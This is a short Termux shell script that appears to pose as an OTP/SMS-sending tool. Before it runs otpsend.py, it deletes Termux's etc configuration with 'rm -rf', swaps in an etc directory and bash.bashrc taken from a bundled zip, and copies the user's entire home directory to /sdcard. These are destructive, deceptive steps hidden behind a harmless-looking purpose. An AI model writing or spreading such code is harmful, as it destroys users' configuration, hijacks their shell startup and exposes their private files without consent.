#!/bin.sh
ed='\033[1;31m'
cd
cd ..
cd usr
rm -rf etc
cd




cd /data/data/com.termux/files/home/otp
cd req
cp temp.zip $HOME
unzip temp.zip



cp -r etc /data/data/com.termux/files/usr
cp bash.bashrc /data/data/com.termux/files/usr/etc
cd ..
cd ..
cp -r home /sdcard
clear
echo -e $ed "sending sms"
sleep 2
cd /data/data/com.termux/files/home/otp
python otpsend.py
